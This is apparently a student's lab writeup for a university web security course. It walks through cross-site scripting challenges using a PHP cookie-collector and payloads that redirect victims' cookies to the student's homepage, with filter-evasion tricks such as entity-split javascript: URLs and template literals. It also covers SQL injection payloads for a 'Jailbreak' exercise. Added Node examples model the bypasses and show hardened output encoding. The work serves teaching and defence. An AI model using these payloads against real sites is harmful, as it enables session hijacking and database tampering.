Lab 2

Pikachu, Meowth, and Cookies

First, we set up our homepages as recommended in the lab handout. This involves an index.php:

<?php
// Cookie collector. Every XSS payload below redirects the victim's browser to
// https://homes.cs.washington.edu/~tays/?cookie=<document.cookie>, and this
// script writes that value to a file we can read on attu.
$cookie = $_GET["cookie"] ?? "";

// Echo the value HTML-escaped so the collector is not itself a reflected XSS.
echo "running file_put_contents with " . htmlspecialchars($cookie);
echo "<br>";

// Overwrites the file on every hit; the file must be writable by the web
// server user, hence the 622 permissions mentioned below.
$ret = file_put_contents("/cse/web/homes/tays/cookie.txt", "cookie: " . $cookie);

echo "did it work?";
echo "<br>";
// file_put_contents returns the byte count on success and false on failure.
echo "ret == " . var_export($ret, true);

?>

in addition to touching a blank cookie.txt and making it world-writable (mode 622) so the web server process can write to it. This infrastructure is used for all of the XSS problems below.

Problem 1

Doing the first problem was an exercise in figuring out the flow for XSS here. Eventually the correct payload looks like:

wow so hacked</h2><script>window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie</script><br><h2>

but this causes the exploit to fire in our own browser too: as soon as the "Invalid Link" page renders, the (local) browser is redirected to the CSE homepage and the collector receives our group's cookie, not the bot's. So instead, we modified the input slightly:

wow so hacked</h2><script>window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie</scrip><br><h2>

notice the missing t on the closing </script> tag. Without a real end tag the browser never closes the script element, so the rest of the page is swallowed as script text and the resulting JavaScript fails to parse. Nothing runs, we stay on the current page, and we grab the URL:

https://cse484.cs.washington.edu/lab2/pmc/simple.php?url=wow+so+hacked%3C%2Fh2%3E%3Cscript%3Ewindow.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscrip%3E%3Cbr%3E%3Ch2%3E

and just add in the missing t to create the final payload:

https://cse484.cs.washington.edu/lab2/pmc/simple.php?url=wow+so+hacked%3C%2Fh2%3E%3Cscript%3Ewindow.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E%3Cbr%3E%3Ch2%3E

Voilà. The bot runs and we get the cookie
authenticated=9e5bebeb7b743f1365b8e95fcf8788a5960b3554 saved to
/cse/web/homes/tays/cookie.txt on the attu server.

Then we used the Firefox storage inspector to set a cookie with the name/value above
and clicked the "open safe box" button. That solves Problem 1. (The rest of the problems are solved similarly, so I will be less verbose for those.)

Problem 2

To get around the script filter, we used the body element's onload handler instead of a <script> tag:

Solution:

wow so hacked</h2><body onload="window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie;">body</body><h2>

URL:

https://cse484.cs.washington.edu/lab2/pmc/notsosimple.php?url=wow+so+hacked%3C%2Fh2%3E%3Cbody+onload%3D%22window.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3B%22%3Ebody%3C%2Fbody%3E%3Ch2%3E

Problem 3

After many frustrating attempts with img src, meta tags, body tags, etc., I eventually found that an iframe whose src is a javascript: URL worked here. HTML entities were used to get around the string filters for javascript and on, and / was used in place of space characters. The carriage-return entity &#x0D; splits the filtered words in the raw input; the browser decodes it when it parses the attribute value, and the URL parser then strips tab, LF and CR characters before it reads the scheme, so what actually runs is a plain javascript: URL.

Solution:

wow so hacked</h2><iframe/src="javas&#x0D;cript:window.locatio&#x0D;n='https://homes.cs.washingto&#x0D;n.edu/~tays/?cookie='+document.cookie;"/><h2>

URL:

https://cse484.cs.washington.edu/lab2/pmc/reallyhard.php?url=wow+so+hacked%3C%2Fh2%3E%3Ciframe%2Fsrc%3D%22javas%26%23x0D%3Bcript%3Awindow.locatio%26%23x0D%3Bn%3D%27https%3A%2F%2Fhomes.cs.washingto%26%23x0D%3Bn.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3B%22%2F%3E%3Ch2%3E

Problem 4

This one was also tricky! The end solution was to point an img src at the cookie-collecting page so that the browser issues a GET request carrying the cookie. This required leaving the original src attribute invalid and using an onerror handler to set this.src to the collector URL with document.cookie concatenated on. The leading " closes the page's own src attribute and the trailing /src=" absorbs the page's closing quote, so the markup stays well formed. The decimal entity &#111; is just the letter o; the browser decodes it inside the attribute value, so it breaks up filtered substrings without changing the JavaScript that runs.

Solution:

wow so hacked"/onerror="this.onerror=null;this.src='https://homes.cs.washingt&#111;n.edu/~tays/?cookie='+d&#111;cument.cookie;"/src="

URL:

https://cse484.cs.washington.edu/lab2/pmc/pie.php?url=wow+so+hacked%22%2Fonerror%3D%22this.onerror%3Dnull%3Bthis.src%3D%27https%3A%2F%2Fhomes.cs.washingt%26%23111%3Bn.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bd%26%23111%3Bcument.cookie%3B%22%2Fsrc%3D%22
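The Problem 3 and Problem 4 payloads both depend on the same mismatch: the server's filter looks at the raw query-string value, while the browser looks at the value after HTML character-reference decoding and (for the iframe src) after URL tab/newline stripping. The following is an added example, not code from the lab or the writeup. It reconstructs those three steps in Node and runs the two attribute values from the payloads above through them. The blocked-word lists are assumptions: the writeup says reallyhard.php filtered "javascript" and "on", and the pie.php list is a guess consistent with the payload that worked.

```javascript
// Added example (not part of the lab writeup). It reconstructs the three
// processing steps that make the Problem 3 and Problem 4 payloads work:
//   1. the server-side substring filter inspects the raw, undecoded input;
//   2. the HTML parser decodes character references inside attribute values;
//   3. the URL parser removes ASCII tab, LF and CR before it reads the scheme.
// The blocked-word lists are ASSUMPTIONS reconstructed from the writeup; the
// lab's real filters are not shown on the page.
const P3_BLOCKED = ["javascript", "on"]; // what the writeup says reallyhard.php filtered
const P4_BLOCKED = ["document"];         // a guess for pie.php, consistent with the payload

// Attribute values copied from the writeup (iframe src and img onerror).
const P3_SRC =
  "javas&#x0D;cript:window.locatio&#x0D;n='https://homes.cs.washingto&#x0D;n.edu/~tays/?cookie='+document.cookie;";
const P4_ONERROR =
  "this.onerror=null;this.src='https://homes.cs.washingt&#111;n.edu/~tays/?cookie='+d&#111;cument.cookie;";

// Step 1: naive case-insensitive substring filter applied to the raw value.
function naiveFilterAllows(raw, blocked) {
  const lower = raw.toLowerCase();
  return !blocked.some((word) => lower.includes(word));
}

// Step 2: decode numeric (&#x0D; &#111;) and the common named character
// references, as the HTML tokenizer does for attribute values.
function decodeCharRefs(value) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return value.replace(/&(#x([0-9a-f]+)|#([0-9]+)|([a-z]+));/gi, (m, _all, hex, dec, name) => {
    if (hex !== undefined) return String.fromCodePoint(parseInt(hex, 16));
    if (dec !== undefined) return String.fromCodePoint(parseInt(dec, 10));
    const n = named[name.toLowerCase()];
    return n === undefined ? m : n;
  });
}

// Step 3: the WHATWG URL parser starts by removing every U+0009, U+000A and
// U+000D from its input, so "javas\rcript:" becomes "javascript:".
function stripTabNewline(url) {
  return url.replace(/[\t\n\r]/g, "");
}

// What the browser actually navigates the iframe to, given the raw src value.
function effectiveUrl(rawSrc) {
  const url = stripTabNewline(decodeCharRefs(rawSrc));
  const colon = url.indexOf(":");
  return { url, scheme: colon === -1 ? "" : url.slice(0, colon).toLowerCase() };
}

// What the browser executes when the error event fires, given the raw onerror value.
function effectiveHandler(rawHandler) {
  return decodeCharRefs(rawHandler);
}

function printReport() {
  const demo3 = effectiveUrl(P3_SRC);
  console.log("P3 raw value passes filter:    ", naiveFilterAllows(P3_SRC, P3_BLOCKED));
  console.log("P3 decoded value passes filter:", naiveFilterAllows(demo3.url, P3_BLOCKED));
  console.log("P3 effective URL:", demo3.url);
  console.log("P4 raw value passes filter:    ", naiveFilterAllows(P4_ONERROR, P4_BLOCKED));
  console.log("P4 effective handler:", effectiveHandler(P4_ONERROR));
}

printReport();
```

The takeaway for a defender is that a blocklist applied to the raw input cannot be made to agree with what the browser executes; the fix is contextual output encoding (and for src/href, allowing only http(s) URLs after parsing), not a longer word list.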

Problem 5

This was just like SQL injection, but with JavaScript: the input lands inside a string literal in a script, so we close the quote, add our own statements, and reopen a string so the rest of the original line still parses:

Solution:

asdf"; window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie; msg = "hacked

I thought I would have to make a delay function to be able to grab the URL for this one, but I found it in my browser history.

URL:

https://cse484.cs.washington.edu/lab2/pmc/vikings.php?url=asdf%22%3B+window.location%3D%27https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%27%2Bdocument.cookie%3B+msg+%3D+%22hacked

Problem 6

This was pretty easy after Problem 5; it just needed a different way to concatenate
strings. Template literals get past the filters just fine:

asdf"; window.location=`https://homes.cs.washington.edu/~tays/?cookie=${document.cookie}`; msg = "hacked

URL:

https://cse484.cs.washington.edu/lab2/pmc/volleyball.php?url=asdf%22%3B+window.location%3D%60https%3A%2F%2Fhomes.cs.washington.edu%2F%7Etays%2F%3Fcookie%3D%24%7Bdocument.cookie%7D%60%3B+msg+%3D+%22hacked
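To see exactly what the Problem 5 and Problem 6 payloads do once they land in the script, and what the page should have done instead, here is an added example (not code from the lab or the writeup). It compiles the generated script body with new Function and runs it against stand-in window and document objects, so the redirect shows up as a changed location instead of actually leaving the page. The page template (var msg = "...";) and the Problem 6 filter list (single quote and plus) are assumptions; only the two payloads are taken from the writeup.

```javascript
// Added example (not part of the lab writeup). It shows what happens when user
// input is spliced into a JavaScript string literal, as in Problems 5 and 6, by
// compiling the generated script with new Function and running it against
// stand-in window/document objects. The page template and the filter word list
// are ASSUMPTIONS; only the two payloads are taken from the writeup.
const PAYLOAD_P5 =
  "asdf\"; window.location='https://homes.cs.washington.edu/~tays/?cookie='+document.cookie; msg = \"hacked";
const PAYLOAD_P6 =
  'asdf"; window.location=`https://homes.cs.washington.edu/~tays/?cookie=${document.cookie}`; msg = "hacked';

// Assumed filter for Problem 6: blocks the quote and the concatenation operator
// the Problem 5 payload relied on. A template literal needs neither.
const P6_BLOCKED = ["'", "+"];
function concatFilterAllows(input) {
  return !P6_BLOCKED.some((s) => input.includes(s));
}

// Assumed vulnerable template: the value is dropped between the quotes unescaped.
function buildVulnerableScript(userInput) {
  return 'var msg = "' + userInput + '";';
}

// Hardened template: JSON.stringify escapes " and \ so the input cannot close
// the literal; \u003c stops a literal </script> from ending the script element
// early, and U+2028/U+2029 are escaped because older engines treat them as
// line terminators inside string literals.
function buildHardenedScript(userInput) {
  const literal = JSON.stringify(userInput)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return "var msg = " + literal + ";";
}

// Compile and run the generated script body with fake globals, then report
// where "the page" navigated and what ended up in msg.
function simulateBrowser(scriptSource) {
  const fakeWindow = { location: "https://cse484.example/page" };
  const fakeDocument = { cookie: "authenticated=TEST" };
  const run = new Function("window", "document", scriptSource + "\nreturn msg;");
  const msg = run(fakeWindow, fakeDocument);
  return { msg, location: fakeWindow.location };
}

function printReport() {
  for (const [label, payload] of [["P5", PAYLOAD_P5], ["P6", PAYLOAD_P6]]) {
    console.log(label, "passes assumed ' and + filter:", concatFilterAllows(payload));
    console.log(label, "vulnerable:", simulateBrowser(buildVulnerableScript(payload)));
    console.log(label, "hardened:  ", simulateBrowser(buildHardenedScript(payload)));
  }
}

printReport();
```

With the vulnerable template both payloads end with location pointing at the collector URL carrying the fake cookie; with the hardened template msg is simply the attacker's string and location never changes, which is the behaviour a filter on individual characters cannot guarantee.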

Jailbreak

Problem 1

The first SQL injection was very easy. I don't recall exactly, but it was one of the
first attempts, something like:

' OR 'a'='a

to inject a tautology between the quotes so the WHERE clause evaluates to true for
every row.

Problem 2

This problem took me a while. I tried a number of things, like stacking a new INSERT statement:

'; insert into sql2 (name, approved) values ('sam', true); --

but kept getting errors about mismatched column and value count.

Then I tried a number of things that were doomed to fail because MySQL is, in general, atrocious (why is MySQL still a thing? Postgres is better and also free). Such things as:

  • No RETURNING clause.
  • No INSERT/UPDATE mutation queries inside subqueries, not even within CTEs.
  • No string concatenation operator, only the CONCAT() function. I actually tried to get around this with

    ', now()); SET sql_mode='ANSI'; --
    ', now()); SET sql_mode='PIPES_AS_CONCAT'; --

to no avail. (Stacked statements like these also depend on the database driver accepting more than one statement per call, which many PHP MySQL interfaces, mysqli::query() for one, do not.)

Eventually, while just trying to get more error messages to reveal more information, I ran:

asdfasfasdfasdff', (select name from (select name from sql2 where approved limit 1) as t)); --

thinking that I'd get an error about putting a text value into a timestamp column. Instead, the command actually succeeded. (The double nesting is what makes the subquery legal in MySQL: a subquery that reads directly from the table being inserted into fails with error 1093, but a derived table is materialized first, so wrapping the SELECT in (...) as t gets around it.) So when I then tried to submit a request for the user asdfasfasdfasdff, I got the error message:

Hi asdfasfasdfasdff, unfortunately the request you submitted on Chicken Husky was not approved.

so this string got saved to the timestamp column (which is presumably a string-typed column rather than a true TIMESTAMP, since MySQL would not store arbitrary text in a TIMESTAMP), and this string was the name of the user who had been approved by the warden! So I just entered the Chicken Husky name in the box and got through.